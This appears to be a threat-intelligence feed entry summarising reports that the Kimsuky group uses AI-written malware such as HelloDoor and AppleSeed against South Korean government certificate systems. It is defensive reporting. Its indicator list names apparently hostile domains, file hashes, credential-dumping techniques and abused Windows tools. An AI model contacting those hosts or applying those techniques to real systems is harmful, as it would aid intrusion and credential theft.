Back

Kimsuky Group Leverages AI for Malware Targeting South Korean Government

Severity: High (Score: 75.5)

Sources: www.genians.co.kr, Securelist, Biz.Chosun, En.Yna.Co.Kr

Summary

The North Korean hacking group Kimsuky is utilizing generative AI to create malware aimed at South Korean government systems, as reported by Kaspersky on May 14, 2026. The malware, named HelloDoor, is a Rust-based backdoor that shows signs of AI involvement in its coding, including the use of emojis and grammatical errors. Kimsuky has also adopted new tactics, such as using Visual Studio Code's remote tunneling feature to covertly access victim devices. The group's AppleSeed malware targets the Government Public Key Infrastructure (GPKI), which is crucial for accessing government systems. If compromised, this could allow unauthorized access to sensitive government accounts. Kaspersky's analysis indicates that military officials, government employees, and telecom workers have been infected. The report emphasizes the need for enhanced detection systems and updated threat intelligence to combat these evolving threats. Key Points: • Kimsuky is using AI to develop malware, including the HelloDoor backdoor. • The group targets South Korean government officials' digital certificates via the AppleSeed malware. • New attack methods include using Visual Studio Code's remote tunneling to evade detection.

Key Entities

  • Apt43 (apt_group)
  • Black Banshee (apt_group)
  • Kimsuky (apt_group)
  • Lazarus Group (apt_group)
  • Ruby Sleet (apt_group)
  • Malware (attack_type)
  • Phishing (attack_type)
  • South Korean Government (company)
  • Cloudflare (company)
  • North Korea (country)
  • South Korea (country)
  • attach.docucloud.o-r.kr (domain)
  • cms.spaceyou.o-r.kr (domain)
  • dirwear.000webhostapp.com (domain)
  • download.uberlingen.com (domain)
  • erp.spaceme.p-e.kr (domain)
  • [email protected] (email)
  • Government (industry)
  • AppleSeed (malware)
  • BabyShark (malware)
  • HelloDoor (malware)
  • HttpMalice (malware)
  • PebbleDash (malware)
  • 07015af18cf8561866bc5b07e6f70d9a (md5)
  • 08160acf08fccecde7b34090db18b321 (md5)
  • 1ae2e46aac55e7f92c72b56b387bc945 (md5)
  • 2a388f3428a6d44a66f5cb0b210379a0 (md5)
  • 2f6fe22be1ed2a6ba42689747c9e18a0 (md5)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1021 - Remote Services (mitre_attack)
  • T1059.001 - PowerShell (mitre_attack)
  • T1059.005 - Visual Basic (mitre_attack)
  • T1071 - Application Layer Protocol (mitre_attack)
  • Windows (platform)
  • Visual Studio Code (platform)
  • Certutil (tool)
  • PowerShell (tool)
  • Regsvr32 (tool)
  • Regsvr32.exe (tool)
  • Rundll32.exe (tool)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed